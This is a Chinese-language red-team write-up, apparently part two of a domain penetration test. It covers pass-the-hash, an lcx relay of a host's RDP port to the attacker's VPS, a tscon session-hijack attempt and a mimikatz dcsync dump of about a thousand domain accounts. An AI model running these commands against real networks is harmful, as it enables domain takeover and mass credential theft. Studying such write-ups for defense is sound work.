文章首发先知社区:https://xz.aliyun.com/t/9941
前言
上次说到,探测到内网三台主机有ms17010的漏洞,准备深挖一波。
MS17010
cs上还是不太好打,派生个会话给msf。我的vps是windows server的,一开始下了个windows版的msf在vps上,但是添加路由的时候一直说我参数不对,就不知道咋回事。
还是算了,就搞个代理到本机用虚拟机kali吧。我用的是frp,vps当server,虚拟机当client
vps配置frps.ini配一个端口
kali配置frpc.ini
然后vps上命令行启动frps.exe
frps.exe -c frps.ini
kali执行
frpc.exe -c frpc.ini
这样就可以愉快的派生会话了,但是这里最后打的时候三台主机没一台能打下来。首先三台主机都没有开启管道,只能用eterblue模块,最后也没成功,这个域系统安全性还是比较高的。
pth
没办法,系统漏洞一台拿不了,但是通过端口扫描发现大量主机开启445端口,于是还是先pass the hash
批量撞一波
断断续续拿下不少主机
这时就一台一台的信息收集
rdp劫持会话
在27这台主机上发现,有两个会话,上面是我们已知账号和明文密码的普通域内账户,而下面这个用户经过比对,为域中域管用户。
由于我们自身权限也高,这里就想rdp上去劫持该会话(当时打的时候比较激动,没注意看这个会话是失效的,这里还是记录一下)看眼时间,应该在休息呢
lcx设置代理目标机器上shell C:Windowssystem32lcx.exe -slave 公网ip 7212 127.0.0.1 3389vps上
lcx -listen 7212 5555
在cs上执行shell tscon 2,没有权限。
在目标机器执行的时候提示错误的密码,猜想大概是会话断联的原因。如果STATE是active应该是没问题的。
拿下DC
将所有拿下的主机的hash全部dump出来,整合后发现有Administrator的账户hash,且是域中账户,而在域中Administrator是作为域管账户的。445端口开启
尝试pth
失败了,如果不能pth这个hash将索然无味,又不能拿到明文这里搞了很久,然后又回去信息收集。搞来搞去搞了很久,还是那么7、8台主机,最后也是没办法,由于抓到了很多密码,把所有Administrator用户的hash全部pass了一遍,终于拿下了域控
导出ntds,抓下密码,这里使用mimikatzlsadump::dcsync /domain:xxx /all /csv command
将近一千个用户,RDP他们好像随时都是连着的。
想3389上去看一下,找一个没有连接的用户
找到该用户的hash拿去解密
成功连接
ENDING...
往期推荐
原文始发于微信公众号(红队蓝军):记一次真实环境渗透(下)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论